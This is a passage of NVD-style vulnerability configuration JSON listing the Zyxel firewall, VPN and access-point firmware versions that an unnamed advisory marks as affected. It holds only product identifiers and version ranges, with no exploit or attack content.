                        "cpe23Uri": "cpe:2.3:o:zyxel:atp100w_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "5.36",
                        "versionStartIncluding": "4.32",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:atp100w:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:atp800_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "5.36",
                        "versionStartIncluding": "4.32",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:atp800:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg_flex_100_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "5.36",
                        "versionStartIncluding": "4.50",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:usg_flex_100:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg_flex_50_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "5.36",
                        "versionStartIncluding": "4.50",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:usg_flex_50:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg_flex_200_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "5.36",
                        "versionStartIncluding": "4.50",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:usg_flex_200:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg_flex_500_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "5.36",
                        "versionStartIncluding": "4.50",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:usg_flex_500:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg_flex_700_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "5.36",
                        "versionStartIncluding": "4.50",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:usg_flex_700:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg_flex_100w_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "5.36",
                        "versionStartIncluding": "4.50",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:usg_flex_100w:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg_20w-vpn_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "5.36",
                        "versionStartIncluding": "4.16",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:usg_20w-vpn:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg_flex_50w_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "5.36",
                        "versionStartIncluding": "4.16",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:usg_flex_50w:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg20-vpn_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "5.36",
                        "versionStartIncluding": "4.30",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:usg20-vpn:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:vpn100_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "5.36",
                        "versionStartIncluding": "4.30",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:vpn100:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:vpn1000_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "5.36",
                        "versionStartIncluding": "4.30",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:vpn1000:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:vpn300_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "5.36",
                        "versionStartIncluding": "4.30",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:vpn300:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:vpn50_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "5.36",
                        "versionStartIncluding": "4.30",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:vpn50:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:nap203_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "6.28\\(abfa.0\\)",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:nap203:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:nap303_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "6.28\\(abex.0\\)",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:nap303:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:nap353_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "6.28\\(abey.0\\)",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:nap353:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:nwa110ax_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "6.50\\(abtg.2\\)",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:nwa110ax:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:nwa1123-ac_hd_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "6.25\\(abin.9\\)",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:nwa1123-ac_hd:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:nwa1123-ac-pro_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "6.28\\(abhd.0\\)",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:nwa1123-ac-pro:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:nwa1123acv3_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "6.50\\(abvt.0\\)",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:nwa1123acv3:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:nwa210ax_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "6.50\\(abtd.2\\)",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:nwa210ax:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:nwa220ax-6e_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "6.50\\(acco.2\\)",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:nwa220ax-6e:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:nwa50ax_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "6.55\\(acge.1\\)",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:nwa50ax:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:nwa50ax-pro_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "6.50\\(acge.0\\)",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:nwa50ax-pro:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:nwa5123-ac_hd_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "6.25\\(abim.9\\)",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:nwa5123-ac_hd:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:nwa55axe_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "6.29\\(abzl.1\\)",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:nwa55axe:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:nwa90ax_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "6.29\\(accv.1\\)",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:nwa90ax:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:nwa90ax-pro_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "6.50\\(acgf.0\\)",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:nwa90ax-pro:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:wac500_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "6.50\\(abvs.0\\)",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:wac500:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:wac500h_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "6.50\\(abwa.0\\)",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:wac500h:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:wac5302d-sv2_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "6.25\\(abvz.9\\)",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:wac5302d-sv2:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:wac6103d-i_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "6.28\\(aaxh.0\\)",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:wac6103d-i:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:wac6303d-s_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "6.25\\(abgl.9\\)",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:wac6303d-s:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:wac6502d-e_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "6.28\\(aasd.0\\)",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:wac6502d-e:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:wac6502d-s_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "6.28\\(aase.0\\)",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:wac6502d-s:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:wac6503d-s_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "6.28\\(aasf.0\\)",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:wac6503d-s:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:wac6552d-s_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "6.28\\(abio.0\\)",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:wac6552d-s:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:wac6553d-e_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "6.28\\(aasg.0\\)",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:wac6553d-e:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:wax510d_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "6.50\\(abtf.2\\)",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:wax510d:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:wax610d_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "6.50\\(abte.2\\)",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:wax610d:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:wax620d-6e_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "6.50\\(accn.2\\)",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:wax620d-6e:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:wax630s_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "6.50\\(abzd.2\\)",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:wax630s:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:wax640s-6e_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "6.50\\(accm.2\\)",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:wax640s-6e:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:wax650s_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "6.50\\(abrm.2\\)",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:wax650s:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:wax655e_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "6.50\\(acdo.2\\)",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
